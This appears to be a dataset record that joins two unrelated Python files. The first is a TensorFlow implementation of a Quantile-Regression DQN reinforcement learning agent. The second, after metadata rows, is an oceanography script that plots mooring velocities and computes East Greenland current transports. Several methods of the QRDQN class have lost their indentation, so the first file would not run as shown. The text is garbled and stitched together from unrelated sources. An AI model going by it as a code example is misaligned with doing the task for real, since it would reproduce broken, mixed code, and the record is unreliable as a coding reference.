    @tf.function
    def _forward(self, inputs, training=True):
        '''Forward actor

        Args:
            inputs (tf.Tensor): batch observations in shape (batch, obs_space.shape).
                tf.uint8 for image observations and tf.float32 for non-image
                observations.
            training (bool, optional): Determine whether in training mode. Default
                to True.

        Return:
            tf.Tensor: predicted quantile Q values in shape
                (batch, act_space.n, n_quantiles), tf.float32
        '''
        # cast and normalize non-float32 inputs (e.g. image with uint8)
        # NOTICE: image in float32 is considered as already normalized
        inputs = preprocess_observation(inputs, self.observation_space)
        # forward network
        latent = self.net(inputs, training=training)
        # forward value net
        values = self.q_net(latent, training=training)
        return values

    @tf.function
    def call(self, inputs, training=True):
        '''Batch predict actions

        Args:
            inputs (tf.Tensor): batch observations in shape (batch, obs_space.shape).
                tf.uint8 for image observations and tf.float32 for non-image
                observations.
            training (bool, optional): Determine whether in training mode. Default
                to True.

        Returns:
            tf.Tensor: Predicted actions in shape (batch, ), tf.int64
            tf.Tensor: Predicted state-action values in shape (batch, act_space.n),
                tf.float32
            tf.Tensor: Predicted quantile Q values shape (batch, act_space.n, n_quantiles)
        '''
        # forward
        quan_vals = self._forward(inputs, training=training) # (batch, act_space.n, n_quantiles)
        # Q value of an action = mean over its quantiles; act greedily.
        values = tf.math.reduce_mean(quan_vals, axis=-1) # (batch, act_space.n)
        actions = tf.math.argmax(values, axis=-1) # (batch,)
        return actions, values, quan_vals

    def predict(self, inputs):
        '''Predict actions

        Args:
            inputs (np.ndarray): batch observations in shape (batch, obs_space.shape)
                or a single observation in shape (obs_space.shape). np.uint8 for image
                observations and np.float32 for non-image observations.

        Returns:
            np.ndarray: predicted actions in shape (batch, ) or (), np.int64
        '''
        # A single (unbatched) observation has exactly obs_space's rank.
        one_sample = (len(inputs.shape) == len(self.observation_space.shape))
        if one_sample:
            inputs = np.expand_dims(inputs, axis=0)
        # predict
        outputs, *_ = self(inputs, training=False)
        outputs = outputs.numpy()
        if one_sample:
            # Undo the batch dimension added above.
            outputs = np.squeeze(outputs, axis=0)
        # predict
        return outputs

    def get_config(self):
        # Constructor kwargs needed to recreate this agent (SavableModel API).
        config = {'observation_space': self.observation_space,
                  'action_space': self.action_space,
                  'n_quantiles': self.n_quantiles,
                  'force_mlp': self.force_mlp}
        return config
class QRDQN(TrainableModel):
    def __init__(self, env, learning_rate: float = 3e-4,
                       buffer_size: int = int(1e6),
                       min_buffer: int = 50000,
                       n_quantiles: int = 200,
                       n_steps: int = 4,
                       n_gradsteps: int = 1,
                       batch_size: int = 64,
                       gamma: float = 0.99,
                       tau: float = 1.0,
                       kappa: float = 1.0,
                       max_grad_norm: float = 0.5,
                       force_mlp: bool = False,
                       explore_schedule: Scheduler = 0.3,
                       verbose: int = 0,
                       **kwargs):
        '''Quantile-Regression DQN (QRDQN)

        The implementation mainly follows its originated paper
        `Distributional Reinforcement Learning with Quantile Regression` by Dabney et al.

        The first argument `env` can be `None` for delayed model setup. You
        should call `set_env()` then call `setup_model()` to manually setup
        the model.

        Args:
            env (gym.Env): Training environment. Can be `None`.
            learning_rate (float, optional): Learning rate. Defaults to 3e-4.
            buffer_size (int, optional): Maximum size of the replay buffer. Defaults to 1000000.
            min_buffer (int, optional): Minimum size of the replay buffer before training.
                Defaults to 50000.
            n_quantiles (int, optional): Number of quantiles. Default to 200.
            n_steps (int, optional): number of steps of rollouts to collect for every epoch.
                Defaults to 4.
            n_gradsteps (int, optional): number of gradient steps in one epoch.
                Defaults to 1.
            batch_size (int, optional): Training batch size. Defaults to 64.
            gamma (float, optional): Decay rate. Defaults to 0.99.
            tau (float, optional): Polyak update parameter. Defaults to 1.0.
            kappa (float, optional): Huber-loss threshold of the quantile
                regression loss. Defaults to 1.0.
            max_grad_norm (float, optional): Gradient clip range. Defaults to 0.5.
            force_mlp (bool, optional): Force to use MLP feature extractor. Defaults to False.
            explore_schedule (Scheduler, optional): Epsilon greedy scheduler, or a
                plain float for a constant rate. Defaults to 0.3.
            verbose (int, optional): More training log. Defaults to 0.
        '''
        super().__init__(**kwargs)

        self.env = env

        # hyperparameters (stored verbatim; consumed by setup_model/training)
        self.learning_rate    = learning_rate
        self.buffer_size      = buffer_size
        self.min_buffer       = min_buffer
        self.n_quantiles      = n_quantiles
        self.n_steps          = n_steps
        self.n_gradsteps      = n_gradsteps
        self.batch_size       = batch_size
        self.gamma            = gamma
        self.tau              = tau
        self.kappa            = kappa
        self.max_grad_norm    = max_grad_norm
        self.force_mlp        = force_mlp
        self.explore_schedule = explore_schedule
        self.verbose          = verbose

        # initialize states (populated by set_env/setup_model)
        self.buffer            = None
        self.tb_writer         = None
        self.observation_space = None
        self.action_space      = None
        self.n_envs            = 0

        if env is not None:
            self.set_env(env)
            self.setup_model(env.observation_space, env.action_space)
def set_env(self, env):
'''Set environment
If the environment is already set, you can call this function
to change the environment. But the observation space and action
space must be consistent with the original one.
Args:
env (gym.Env): Training environment.
'''
if self.observation_space is not None:
assert env.observation_space == self.observation_space, 'Observation space mismatch, expect {}, got {}'.format(
self.observation_space, env.observation_space)
if self.action_space is not None:
assert env.action_space == self.action_space, 'Action space mismatch, expect {}, got {}'.format(
self.action_space, env.action_space)
self.env = env
self.n_envs = env.n_envs
    def setup_model(self, observation_space, action_space):
        '''Setup model, optimizer and scheduler for training.

        Creates the replay buffer, the online and target quantile
        networks, the Adam optimizer, and the exploration-rate scheduler.
        Must be called (directly or via the constructor) before `learn()`.

        Args:
            observation_space (gym.Spaces): The observation space of the
                environment.
            action_space (gym.Spaces): The action space of the environment.
        '''
        self.observation_space = observation_space
        self.action_space = action_space
        # --- setup model ---
        self.buffer = ReplayBuffer(buffer_size=self.buffer_size)
        # online network (trained) and target network (slowly updated copy)
        self.agent = Agent(self.observation_space, self.action_space,
                    n_quantiles=self.n_quantiles, force_mlp=self.force_mlp)
        self.agent_target = Agent(self.observation_space, self.action_space,
                    n_quantiles=self.n_quantiles, force_mlp=self.force_mlp)
        # clipnorm applies the max_grad_norm gradient clipping inside Adam
        self.optimizer = tf.keras.optimizers.Adam(learning_rate=self.learning_rate,
                                                clipnorm=self.max_grad_norm)
        # initialize target: hard-copy online weights into the target network
        self.agent_target.update(self.agent)
        # setup scheduler: wrap the raw epsilon value/schedule into a Scheduler
        self.explore_schedule = Scheduler.get_scheduler(self.explore_schedule,
                                                        state_object=self.state)
    @tf.function
    def _forward(self, inputs, training=True):
        '''Forward pass of the online network (delegates to `self.agent`).

        Args:
            inputs (tf.Tensor): batch observations in shape (batch, obs_space.shape).
                tf.uint8 for image observations and tf.float32 for non-image
                observations.
            training (bool, optional): Determine whether in training mode. Default
                to True.

        Return:
            tf.Tensor: predicted quantile Q values in shape (batch, act_space.n, n_quantiles),
                tf.float32
        '''
        return self.agent._forward(inputs, training=training)
    @tf.function
    def call(self, inputs, training=True):
        '''Batch predict actions (delegates to the online `self.agent`).

        Args:
            inputs (tf.Tensor): batch observations in shape (batch, obs_space.shape).
                tf.uint8 for image observations and tf.float32 for non-image
                observations.
            training (bool, optional): Determine whether in training mode. Default
                to True.

        Returns:
            tf.Tensor: Predicted actions in shape (batch, ), tf.int64
            tf.Tensor: Predicted state-action values in shape (batch, act_space.n),
                tf.float32
            tf.Tensor: Predicted quantile Q values shape (batch, act_space.n, n_quantiles)
        '''
        return self.agent(inputs, training=training)
    def predict(self, inputs):
        '''Predict greedy actions for numpy inputs (delegates to `self.agent`).

        Args:
            inputs (np.ndarray): batch observations in shape (batch, obs_space.shape)
                or a single observation in shape (obs_space.shape). np.uint8 for image
                observations and np.float32 for non-image observations.

        Returns:
            np.ndarray: predicted actions in shape (batch, ) or (), np.int64
        '''
        return self.agent.predict(inputs)
    @tf.function
    def value_loss(self, obs, action, next_obs, done, reward):
        '''Quantile-regression Huber loss (QR-DQN, Dabney et al.).

        Pairs every predicted quantile of Q(obs, action) against every
        target quantile of the one-step bootstrap target, applies the
        kappa-Huber loss, and weights it by the asymmetric quantile
        factor |tau_i - 1{u < 0}|.

        Args:
            obs (tf.Tensor): batch observations, shape (batch, obs_space.shape),
                tf.uint8 for image observations, tf.float32 for non-image observations
            action (tf.Tensor): batch actions, shape (batch, ),
                tf.int32 or tf.int64 for discrete action space
            next_obs (tf.Tensor): batch next observations, shape (batch, obs_space.shape),
                tf.uint8 for image observations, tf.float32 for non-image observations
            done (tf.Tensor): batch done, shape (batch, ), tf.bool or tf.float32
            reward (tf.Tensor): batch reward, shape (batch, ), tf.float32

        Returns:
            tf.Tensor: scalar loss, tf.float32
        '''
        action = tf.cast(action, dtype=tf.int64)
        reward = tf.cast(reward, dtype=tf.float32)
        done = tf.cast(done, dtype=tf.float32)
        reward = tf.expand_dims(reward, axis=-1) # (batch, 1)
        done = tf.expand_dims(done, axis=-1) # (batch, 1)
        # generate quantile midpoints tau_i = (i + 0.5) / N, i = 0..N-1
        tau_i = (np.arange(self.n_quantiles, dtype=np.float32) + 0.5) / self.n_quantiles
        tau_i = tf.constant(tau_i) # (n_quantiles,)
        tau_i = tf.reshape(tau_i, (1, -1, 1)) # (1, n_quantiles, 1)
        # compute target quantile q values using the target network's
        # greedy next action; gather selects that action's quantiles per row
        next_act, _, next_qs = self.agent_target(next_obs)
        target_q = tf.gather(next_qs, indices=next_act, batch_dims=1) # (batch, n_quantiles)
        y = reward + (1.-done) * self.gamma * target_q # (batch, n_quantiles)
        # no gradient flows through the bootstrap target
        y = tf.stop_gradient(y)
        # compute current quantile q values for the taken action
        qs = self.agent._forward(obs) # (batch, act_space.n, n_quantiles)
        q = tf.gather(qs, indices=action, batch_dims=1) # (batch, n_quantiles)
        # compute huber loss over all (current quantile i, target quantile j) pairs
        y = tf.expand_dims(y, axis=-2) # (batch, 1, n_quantiles)
        q = tf.expand_dims(q, axis=-1) # (batch, n_quantiles, 1)
        u = y - q # (batch, n_quantiles, n_quantiles) td error
        abs_u = tf.math.abs(u)
        huber = tf.where(abs_u > self.kappa, self.kappa * (abs_u - 0.5*self.kappa),
                        0.5 * tf.math.square(u)) # (batch, n_quantiles, n_quantiles)
        loss = tf.abs(tau_i - tf.cast(u < 0.0, dtype=tf.float32)) * huber # (batch, n_quantiles, n_quantiles)
        # sum over current-quantile axis (-2), mean over batch and target quantiles
        loss = tf.math.reduce_mean(tf.math.reduce_sum(loss, axis=-2))
        return loss
@tf.function
def _train_step(self, obs, action, next_obs, done, reward):
'''Perform one gradient update
Args:
obs (tf.Tensor): batch observations, shape (batch, obs_space.shape),
tf.uint8 for image observations, tf.float32 for non-image observations
action (tf.Tensor): batch actions, shape (batch, ),
tf.int32 or tf.int64 for discrete action space
next_obs (tf.Tensor): batch next observations, shape (batch, obs_space.shape),
tf.uint8 for image observations, tf.float32 for non-image observations
done (tf.Tensor): batch done, shape (batch, ), tf.bool or tf.float32
reward (tf.Tensor): batch reward, shape (batch, ), tf.float32
Returns:
tf.Tensor: loss, tf.float32
'''
variables = self.agent.trainable_variables
with tf.GradientTape() as tape:
tape.watch(variables)
loss = self.value_loss(obs, action, next_obs, done, reward)
# perform gradients
grads = tape.gradient(loss, variables)
self.optimizer.apply_gradients(zip(grads, variables))
return loss
def _run(self, steps, obs=None):
'''Run environments, collect rollouts
Args:
steps (int): number of timesteps
obs (np.ndarray, optional): the last observations. If `None`,
reset the environment.
Returns:
np.ndarray: the last observations.
'''
if obs is None:
obs = self.env.reset()
for _ in range(steps):
if (len(self.buffer) < self.min_buffer or
np.random.rand() < self.explore_schedule()):
# random action
action = np.asarray([self.action_space.sample()
for n in range(self.n_envs)])
else:
# predict action
action, *_ = self(obs)
# step environment
new_obs, reward, done, infos = self.env.step(action)
# add to buffer
self.buffer.add(obs, new_obs, action, reward, done)
obs = new_obs
# update state
self.num_timesteps += self.n_envs
return new_obs
def train(self, steps, batch_size, target_update):
'''Train one epoch
Args:
steps (int): gradient steps
batch_size (int): batch size
target_update (int): target network update frequency (gradient steps)
Returns:
float: mean loss
'''
all_loss = []
for _step in range(steps):
(obs, action, next_obs, done, reward) = self.buffer(batch_size)
loss = self._train_step(obs, action, next_obs, done, reward)
all_loss.append(loss)
self.num_gradsteps += 1
# update target networks
if self.num_gradsteps % target_update == 0:
self.agent_target.update(self.agent, polyak=self.tau)
m_loss = np.mean(np.hstack(np.asarray(all_loss)))
return m_loss
    def eval(self, env, n_episodes=5, max_steps=-1):
        '''Evaluate model (use default evaluation method from the base class).

        Args:
            env (gym.Env): the environment for evaluation
            n_episodes (int, optional): number of episodes to evaluate.
                Defaults to 5.
            max_steps (int, optional): maximum steps in one episode.
                Defaults to -1, which runs each episode until done.

        Returns:
            list: total rewards for each episode
            list: episode length for each episode
        '''
        return super().eval(env, n_episodes=n_episodes,
                            max_steps=max_steps)
    def learn(self, total_timesteps: int,
                    log_interval: int = 1000,
                    eval_env: gym.Env = None,
                    eval_interval: int = 10000,
                    eval_episodes: int = 5,
                    eval_max_steps: int = 3000,
                    save_interval: int = 10000,
                    save_path: str = None,
                    target_update: int = 2500,
                    tb_logdir: str = None,
                    reset_timesteps: bool = False):
        '''Train QRDQN: alternate rollout collection and gradient updates
        until `total_timesteps` environment steps have been taken.

        Args:
            total_timesteps (int): Total timesteps to train agent.
            log_interval (int, optional): Print log every ``log_interval``
                epochs. Defaults to 1000.
            eval_env (gym.Env, optional): Environment for evaluation.
                Defaults to None (no evaluation).
            eval_interval (int, optional): Evaluate every ``eval_interval``
                epochs. Defaults to 10000.
            eval_episodes (int, optional): Evaluate ``eval_episodes`` episodes
                for every evaluation. Defaults to 5.
            eval_max_steps (int, optional): maximum steps every evaluation.
                Defaults to 3000.
            save_interval (int, optional): Save model every ``save_interval``
                epochs. Defaults to 10000.
            save_path (str, optional): Model saving path. Default to None
                (no checkpoints written).
            target_update (int, optional): Frequency of updating target network.
                update every ``target_update`` gradient steps. Defaults to 2500.
            tb_logdir (str, optional): tensorboard log directory. Defaults to None.
            reset_timesteps (bool, optional): reset timesteps. Defaults to False.

        Returns:
            QRDQN: self
        '''
        assert self.env is not None, 'Env not set, call set_env() before training'
        # create tensorboard writer
        if tb_logdir is not None:
            self.tb_writer = tf.summary.create_file_writer(tb_logdir)
        # initialize state
        if reset_timesteps:
            self.num_timesteps = 0
            self.num_gradsteps = 0
            self.num_epochs = 0
            self.progress = 0
            # reset buffer
            self.buffer.reset()
        obs = None
        time_start = time.time()
        time_spent = 0
        # one epoch = n_steps rollout steps across n_envs parallel envs
        timesteps_per_epoch = self.n_steps * self.n_envs
        # +0.5 rounds to nearest integer number of epochs
        total_epochs = int(float(total_timesteps-self.num_timesteps) /
                        float(timesteps_per_epoch) + 0.5)
        while self.num_timesteps < total_timesteps:
            # collect rollouts
            obs = self._run(steps=self.n_steps, obs=obs)
            # update state
            self.num_epochs += 1
            self.progress = float(self.num_timesteps) / float(total_timesteps)
            # only train once the replay buffer has warmed up
            if len(self.buffer) > self.min_buffer:
                # training
                loss = self.train(self.n_gradsteps,
                                batch_size=self.batch_size,
                                target_update=target_update)
                # write tensorboard
                if self.tb_writer is not None:
                    with self.tb_writer.as_default():
                        tf.summary.scalar('loss', loss, step=self.num_timesteps)
                        tf.summary.scalar('explore_rate', self.explore_schedule(),
                                        step=self.num_timesteps)
                    self.tb_writer.flush()
            # print training log
            # NOTE: `loss` is only bound after warmup; the logging branch
            # below guards on the same buffer-size condition before using it
            if (log_interval is not None) and (self.num_epochs % log_interval == 0):
                # current time
                time_now = time.time()
                # execution time (one epoch)
                execution_time = (time_now - time_start) - time_spent
                # total time spent
                time_spent = (time_now - time_start)
                # remaining time
                remaining_time = (time_spent / self.progress)*(1.0-self.progress)
                # eta
                eta = (datetime.datetime.now() + datetime.timedelta(seconds=remaining_time)).strftime('%Y-%m-%d %H:%M:%S')
                # average steps per second
                fps = float(self.num_timesteps) / time_spent
                LOG.set_header('Epoch {}/{}'.format(self.num_epochs, total_epochs))
                LOG.add_line()
                LOG.add_row('Timesteps', self.num_timesteps, total_timesteps, fmt='{}: {}/{}')
                LOG.add_row('Steps/sec', fps, fmt='{}: {:.2f}')
                LOG.add_row('Progress', self.progress*100.0, fmt='{}: {:.2f}%')
                if self.verbose > 0:
                    LOG.add_row('Execution time', datetime.timedelta(seconds=execution_time))
                    LOG.add_row('Elapsed time', datetime.timedelta(seconds=time_spent))
                    LOG.add_row('Remaining time', datetime.timedelta(seconds=remaining_time))
                    LOG.add_row('ETA', eta)
                LOG.add_line()
                if len(self.buffer) > self.min_buffer:
                    LOG.add_row('Loss', loss, fmt='{}: {:.6f}')
                    LOG.add_row('Explore rate', self.explore_schedule(), fmt='{}: {:.6f}')
                else:
                    LOG.add_row('Collecting rollouts {}/{}'.format(len(self.buffer), self.min_buffer))
                LOG.add_line()
                LOG.flush('INFO')
            # evaluate model
            eps_rews, eps_steps = [], []
            if (eval_env is not None) and (self.num_epochs % eval_interval == 0):
                eps_rews, eps_steps = self.eval(env=eval_env,
                                                n_episodes=eval_episodes,
                                                max_steps=eval_max_steps)
                # per-evaluation statistics (best episode + mean/std)
                max_idx = np.argmax(eps_rews)
                max_rews = eps_rews[max_idx]
                max_steps = eps_steps[max_idx]
                mean_rews = np.mean(eps_rews)
                std_rews = np.std(eps_rews)
                mean_steps = np.mean(eps_steps)
                if self.tb_writer is not None:
                    with self.tb_writer.as_default():
                        tf.summary.scalar('max_rewards', max_rews, step=self.num_timesteps)
                        tf.summary.scalar('mean_rewards', mean_rews, step=self.num_timesteps)
                        tf.summary.scalar('std_rewards', std_rews, step=self.num_timesteps)
                        tf.summary.scalar('mean_length', mean_steps, step=self.num_timesteps)
                    self.tb_writer.flush()
                if self.verbose > 1:
                    for ep in range(eval_episodes):
                        LOG.set_header('Eval episode {}/{}'.format(ep+1, eval_episodes))
                        LOG.add_line()
                        LOG.add_row('Rewards', eps_rews[ep])
                        LOG.add_row(' Length', eps_steps[ep])
                        LOG.add_line()
                        LOG.flush('INFO')
                LOG.set_header('Evaluate {}/{}'.format(self.num_epochs, total_epochs))
                LOG.add_line()
                LOG.add_row('Max rewards', max_rews)
                LOG.add_row(' Length', max_steps)
                LOG.add_line()
                LOG.add_row('Mean rewards', mean_rews)
                LOG.add_row(' Std rewards', std_rews, fmt='{}: {:.3f}')
                LOG.add_row(' Mean length', mean_steps)
                LOG.add_line()
                LOG.flush('INFO')
            # save model
            if ((save_path is not None) and (save_interval is not None)
                    and (self.num_epochs % save_interval) == 0):
                saved_path = self.save(save_path, checkpoint_number=self.num_epochs,
                            checkpoint_metrics=self.get_eval_metrics(eps_rews, eps_steps))
                if self.verbose > 0:
                    LOG.info('Checkpoint saved to: {}'.format(saved_path))
                    # find the best model path
                    best_path = self._preload(save_path, best=True)
                    if best_path == os.path.abspath(saved_path):
                        LOG.debug(' (Current the best)')
        return self
def get_config(self):
init_config = { 'learning_rate': self.learning_rate,
'buffer_size': self.buffer_size,
'min_buffer': self.min_buffer,
'n_quantiles': self.n_quantiles,
'n_steps': self.n_steps,
'n_gradsteps': self.n_gradsteps,
'batch_size': self.batch_size,
'gamma': self.gamma,
'tau': self.tau,
'kappa': self.kappa,
'max_grad_norm': self.max_grad_norm,
'force_mlp': self.force_mlp,
'explore_schedule': self.explore_schedule,
'verbose': self.verbose}
setup_config = {'observation_space': self.observation_space,
'action_space': self.action_space}
return {'init_config': init_config,
'setup_config': setup_config}
@classmethod
def from_config(cls, config):
assert 'init_config' in config, 'Failed to load {} config, init_config not found'.format(cls.__name__)
assert 'setup_config' in config, 'Failed to load {} config, setup_config not found'.format(cls.__name__)
init_config = config['init_config']
setup_config = config['setup_config']
# construct model
self = cls(env=None, **init_config)
self.setup_model(**setup_config)
return self | [
"joehsiao@gapp.nthu.edu.tw"
] | joehsiao@gapp.nthu.edu.tw |
4677fbdc2a00050d77fd0d794bb57194c2f5ee75 | e8e4bb89c6ce57c038de445091ddebc1c1b6eb26 | /oldscripts/Transport_permoor_newer.py | 7b4c40d98f9b1bbd636b05bd970899b248439250 | [] | no_license | ilebras/OSNAP | dc7fba846f866ec64edab35a278d2ce6c86e5f97 | a5b22026351d2eb8dc4c89e2949be97122936d23 | refs/heads/master | 2021-05-12T16:46:18.955345 | 2020-09-08T23:04:23 | 2020-09-08T23:04:23 | 117,025,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,958 | py | #################################################################################
#################################################################################
#################################################################################
######################## CALCULATE TRANSPORT ###################################
#################################################################################
#################################################################################
#################################################################################
# NOTE(review): star-import presumably provides numpy/pylab/pickle names
# used throughout this script (plot, contourf, hstack, ...) -- verify
from aux_funcs import *
# de-tided Cape Farewell (CF) mooring data loaded as one object ("daily")
daily=pickle.load(open('../pickles/CF_xarray_notid.pickle','rb'))
#################################################################################
# Have a quick look at CF1 evolution in time
#################################################################################
def plotmoortime(moornum):
    '''Plot a depth-time (Hovmueller) section of across-track velocity for
    mooring CF<moornum> and save it as both png and pdf.

    NOTE(review): an identical definition is repeated just below; the
    later one is the definition that actually wins.
    '''
    figure(figsize=(12,3))
    ax=contourf(daily.date.data,daily.depth,daily['across track velocity'][moornum-1,:,:],cmap=cm.RdBu_r,vmin=-1.25,vmax=1.25)
    colorbar(ticks=[-1.5,-1,-0.5,0,0.5])
    # overlay the -0.75 m/s contour in black
    contour(daily.date.data,daily.depth,daily['across track velocity'][moornum-1,:,:],[-0.75],colors='k')
    # show only the top 170 m, surface at the top
    ylim([170,0])
    ylabel('depth (m)')
    xlabel('date')
    title('CF'+str(moornum)+' across track velocity')
    savefig('../figures/hovmueller/cf'+str(moornum)+'_vel.png',bbox_inches='tight')
    savefig('../figures/hovmueller/cf'+str(moornum)+'_vel.pdf',bbox_inches='tight')
def plotmoortime(moornum):
    '''Identical re-definition of plotmoortime (duplicated cell in this
    notebook-style script); this later definition shadows the earlier one.
    '''
    figure(figsize=(12,3))
    ax=contourf(daily.date.data,daily.depth,daily['across track velocity'][moornum-1,:,:],cmap=cm.RdBu_r,vmin=-1.25,vmax=1.25)
    colorbar(ticks=[-1.5,-1,-0.5,0,0.5])
    contour(daily.date.data,daily.depth,daily['across track velocity'][moornum-1,:,:],[-0.75],colors='k')
    ylim([170,0])
    ylabel('depth (m)')
    xlabel('date')
    title('CF'+str(moornum)+' across track velocity')
    savefig('../figures/hovmueller/cf'+str(moornum)+'_vel.png',bbox_inches='tight')
    savefig('../figures/hovmueller/cf'+str(moornum)+'_vel.pdf',bbox_inches='tight')
# NOTE(review): leftover plotting-parameter list from another cell; this
# bare expression has no effect here
['salinity',linspace(32.5,35.5,31),cm.YlGnBu_r,arange(32,35.5,0.4),'']
# render the Hovmueller velocity section for moorings CF1..CF8
for rr in range(1,9):
    plotmoortime(rr)
#################################################################################
#################################################################################
############# Get EGCC and EGC transports ####################################
#################################################################################
#################################################################################
#################################################################################
# Quick code for looking at monthly averages
#################################################################################
def monthplot(afield):
    '''Facet-plot monthly means of `afield` (first 12 months), one
    depth-distance panel per month, four panels per row.'''
    figure()
    afield.resample('M',dim='date',how='mean')[:12,:,:].plot(x='distance', y='depth', col='date', col_wrap=4)
monthplot(daily['across track velocity'])
# NOTE(review): ylim acts on the current axes only -- presumably intended
# to flip/limit the depth axis of the facet grid; verify it has effect
ylim([1000,0])
#################################################################################
################ Find and examine isohalines ###################################
#################################################################################
#
# def find_isohaline(which):
#
# maxdepth=pd.DataFrame(index=daily.date, columns=daily.distance)
#
# for j, m in enumerate(daily.distance):
# for i, d in enumerate(daily.date):
# thissal=daily.salinity[j,:,i]
# nanind=~isnan(thissal)
# if sum(nanind)==0:
# maxdepth.iloc[i,j]=nan
# elif sum((thissal[nanind]>which))==0:
# maxdepth.iloc[i,j]=max(daily.depth[nanind])
# else:
# maxdepth.iloc[i,j]=float(daily.depth[nanind][(thissal[nanind]>which)].min())
#
# maxdepth=maxdepth.astype('float')
# return maxdepth
#
#
# max34depth=find_isohaline(34)
# max348depth=find_isohaline(34.8)
#
# colors=pal.cubehelix.perceptual_rainbow_16.get_mpl_colormap()
#
# fig, ax = plt.subplots(1)
# fig.set_size_inches(12,4)
# max34depth.plot(ax=ax, cmap=colors, alpha=0.5,label=False)
# g=max34depth.resample('M',closed='right').mean().plot(ax=ax, cmap=colors, alpha=1, lw=2)
# legend(loc=(1.05,0))
# gca().invert_yaxis()
# title('Depth of 34 isohaline along CF array')
# savefig('../figures/isohalines/34tseries.png')
#
# fig, ax = plt.subplots(1)
# fig.set_size_inches(12,4)
# max348depth.plot(ax=ax, cmap=colors, alpha=0.5,label=False)
# num=max348depth.resample('M').mean().plot(ax=ax, cmap=colors, alpha=1, lw=2)
# num.legend(loc=(1.05,0))
# gca().invert_yaxis()
# title('Depth of 34.8 isohaline along CF array')
# savefig('../figures/isohalines/348tseries.png')
#
# fig, ax = plt.subplots(1)
# fig.set_size_inches(12,4)
# num=max34depth.resample('M').mean().plot(ax=ax, cmap=colors, alpha=1, lw=2,linestyle='--')
# max348depth.resample('M').mean().plot(ax=ax, cmap=colors, alpha=1, lw=2)
# num.legend(loc=(1.05,0))
# title('Depths of 34 and 34.8 isohalines along CF array')
# gca().invert_yaxis()
# savefig('../figures/isohalines/34and348tseries.png')
#################################################################################
### Look at velocity magnitudes at different moorings
#################################################################################
# --- Minimum (strongest negative) across-track velocity per mooring ---
# NOTE(review): loop covers CF1-3 but the file is named CF1-2 -- verify
figure(figsize=(14,3))
for rr in range(3):
    plot(daily.date,daily['across track velocity'].min(dim='depth')[rr],alpha=0.5,label='CF'+str(rr+1))
    plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean').min(dim='depth')[rr])
legend(loc=(1.05,0))
# NOTE(review): 0.15 * CF1 minimum velocity plotted in black -- presumably
# a scaled reference curve; confirm intent
plot(daily.date,0.15*daily['across track velocity'].min(dim='depth')[0],'k')
savefig('../figures/minvels/CF1-2.png')
# CF2 vs CF3 daily minimum velocities
figure(figsize=(14,3))
for rr in range(1,3):
    plot(daily.date,daily['across track velocity'].min(dim='depth')[rr],alpha=0.75,label='CF'+str(rr+1))
    # plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean').min(dim='depth')[rr])
legend(loc=(1.05,0.2))
title('CF2 and 3 track each other closely')
savefig('../figures/minvels/CF2-3.png')
# monthly-mean minimum vs surface velocity, one figure per mooring
for rr in range(8):
    figure(figsize=(14,3))
    # plot(daily.date,daily['across track velocity'].min(dim='depth')[rr],alpha=0.5,label='CF'+str(rr+1))
    plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean').min(dim='depth')[rr],label='min vel')
    title('CF'+str(rr+1))
    plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean')[rr,0,:],label='surface vel')
    legend(loc=(1.05,0.2))
    ylabel('velocity (m/s)')
    savefig('../figures/velstats/CF'+str(rr+1)+'_minvelcomp_monthly.png',bbox_inches='tight')
# same comparison on daily resolution
for rr in range(8):
    figure(figsize=(14,3))
    plot(daily.date,daily['across track velocity'].min(dim='depth')[rr],label='min vel')
    axhline(0)
    title('CF'+str(rr+1))
    plot(daily.date,daily['across track velocity'][rr,0,:],label='surface vel')
    legend(loc=(1.05,0.2))
    ylabel('velocity (m/s)')
    savefig('../figures/velstats/CF'+str(rr+1)+'_minvelcomp_daily.png',bbox_inches='tight')
# NOTE(review): no-op inspection left over from interactive use
daily.dims
# monthly-mean surface velocity for all moorings in one panel
figure(figsize=(14,3))
for rr in range(8):
    plot(daily.resample('M',dim='date',how='mean').date,daily['across track velocity'].resample('M',dim='date',how='mean')[rr,0,:],label='CF'+str(rr+1))
legend(loc=(1.05,0.2))
savefig('../figures/velstats/Monthlyave_surf_all.png')
#################################################################################
# Transport -- define as solely at CF1 for now
#################################################################################
# Horizontal cell widths for each mooring: midpoints between neighbouring
# mooring distances, with 12 and 17 as the assumed widths at the two ends
# (units presumably km -- verify against `daily.distance`)
mid_dist=hstack((12,(diff(daily.distance)[:-1]+diff(daily.distance)[1:])/2,17))
# broadcast widths / depth-bin thicknesses to (distance, depth-1, date)
middistmat=transpose((tile(mid_dist,[len(daily.depth)-1,len(daily.date),1])),(2,0,1))
depthdiffmat=transpose((tile(diff(daily.depth),[len(daily.distance),len(daily.date),1])),(0,2,1))
# NOTE(review): no-op shape inspection left over from interactive use
shape(middistmat[:,:,:])
# CF1 velocity on the depth-bin grid (drop the last depth level)
cf1vel=daily['across track velocity'][0,:-1,:]
# vel * dz * dx summed over depth; /1e3 presumably converts to Sv -- verify units
cctrans=(cf1vel*depthdiffmat[0,:,:]*middistmat[0,:,:]/1e3).sum('depth')
# same, but only where salinity < 34 (fresh coastal-current water)
cctrans_sal=(daily.where(daily.salinity<34)['across track velocity'][0,:-1,:]*depthdiffmat[0,:,:]*middistmat[0,:,:]/1e3).sum('depth')
# --- EGCC (CF1) transport: full column vs fresh (<34) water only ---
cctrans.plot(figsize=(12,3),label='Full CF1 water column')
axhline(0)
cctrans.resample('M',how='mean',dim='date').plot(linewidth=2,label='',)
cctrans_sal.plot(label='Fresher than 34 at CF1')
legend()
ylabel('Transport (Sv)')
title('Transport at CF1 (EGCC)')
savefig('../figures/trans/CF1trans.png')
# scaled copy used later for visual comparison against the EGC
cctrans_scaled=cctrans*3
cctrans.plot(figsize=(12,3),label='')
axhline(0)
cctrans.resample('M',how='mean',dim='date').plot(linewidth=2,label='',)
# cctrans_sal.plot(label='Fresher than 34 at CF1')
legend()
ylabel('[Sv]')
title('EG Coastal Current transport')
savefig('../figures/trans/EGCC_trans.pdf')
cctrans.resample('W',how='mean',dim='date').plot(figsize=(12,3))
# --- Total transport across CF2..end (the EGC system) ---
EGtottrans=(daily['across track velocity'][1:,:-1,:]*depthdiffmat[1:,:,:]*middistmat[1:,:,:]/1e3).sum('distance').sum('depth')
